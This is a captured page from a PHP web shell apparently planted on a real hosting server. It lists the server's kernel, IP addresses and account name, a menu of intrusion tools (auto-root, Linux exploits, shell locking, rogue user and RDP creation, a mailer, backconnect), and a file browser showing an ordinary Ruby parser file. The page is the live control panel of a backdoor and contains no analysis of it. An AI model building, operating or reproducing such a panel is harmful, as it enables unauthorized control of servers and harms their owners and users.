Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.217.116
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby34 /
share /
ruby /
prism /
translation /
[ HOME SHELL ]
Name
Size
Permission
Action
parser
[ DIR ]
drwxr-xr-x
ripper
[ DIR ]
drwxr-xr-x
parser.rb
14.14
KB
-rw-r--r--
parser33.rb
262
B
-rw-r--r--
parser34.rb
262
B
-rw-r--r--
parser35.rb
262
B
-rw-r--r--
parser_current.rb
604
B
-rw-r--r--
ripper.rb
94.94
KB
-rw-r--r--
ruby_parser.rb
53.51
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : parser_current.rb
# frozen_string_literal: true # :markup: markdown # typed: ignore # module Prism module Translation case RUBY_VERSION when /^3\.3\./ ParserCurrent = Parser33 when /^3\.4\./ ParserCurrent = Parser34 when /^3\.5\./ ParserCurrent = Parser35 else # Keep this in sync with released Ruby. parser = Parser34 major, minor, _patch = Gem::Version.new(RUBY_VERSION).segments warn "warning: `Prism::Translation::Current` is loading #{parser.name}, " \ "but you are running #{major}.#{minor}." ParserCurrent = parser end end end
Close